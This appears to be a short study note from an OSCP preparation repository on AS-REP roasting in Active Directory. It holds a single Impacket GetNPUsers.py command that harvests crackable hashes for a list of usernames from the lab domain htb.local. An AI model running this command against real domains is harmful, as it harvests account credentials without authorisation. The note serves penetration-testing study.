Files
oscp/Windows/Active Directory for OSCP/We have User Name but no Password/ASREP Roast.md
T
2025-11-21 17:17:42 +01:00

7 lines
155 B
Markdown

```sh
ls /usr/share/doc/python3-impacket/examples
python3 GetNPUsers.py htb.local/ -usersfile user.txt -format hashcat -outputfile hashes.domain.txt
```